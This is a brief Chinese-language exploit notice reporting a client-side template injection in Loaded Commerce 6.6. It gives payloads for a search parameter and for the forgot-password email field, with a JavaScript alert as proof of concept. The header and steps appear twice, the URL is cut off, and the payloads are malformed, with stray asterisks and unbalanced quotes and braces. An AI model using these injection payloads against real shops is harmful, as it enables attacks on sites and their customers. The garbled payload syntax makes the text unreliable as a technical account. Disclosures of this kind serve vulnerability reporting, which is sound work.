#利用标题:加载商务6.6客户端模板注入(CSTI)
#日期: 03/13/2025
#利用作者: TMRSWRR
#供应商homepage: https://loadedcommerce.com/
#版本: 6.6
#测试在: https://www.softaculous.com/apps/ecommerce/loaded_commerce
将{{7*7}}注入搜索参数
https://demos1.softaculous.com/load...t=core/advanced_search_search_resultkeywords={7***}}
返回49,确认模板注入漏洞。
忘记密码:
在“忘记密码”页面上的电子邮件字段中提交{{constructor.constructor('alert(1)}}}
触发警报,演示客户端代码执行。
#日期: 03/13/2025
#利用作者: TMRSWRR
#供应商homepage: https://loadedcommerce.com/
#版本: 6.6
#测试在: https://www.softaculous.com/apps/ecommerce/loaded_commerce
将{{7*7}}注入搜索参数
https://demos1.softaculous.com/load...t=core/advanced_search_search_resultkeywords={7***}}
返回49,确认模板注入漏洞。
忘记密码:
在“忘记密码”页面上的电子邮件字段中提交{{constructor.constructor('alert(1)}}}
触发警报,演示客户端代码执行。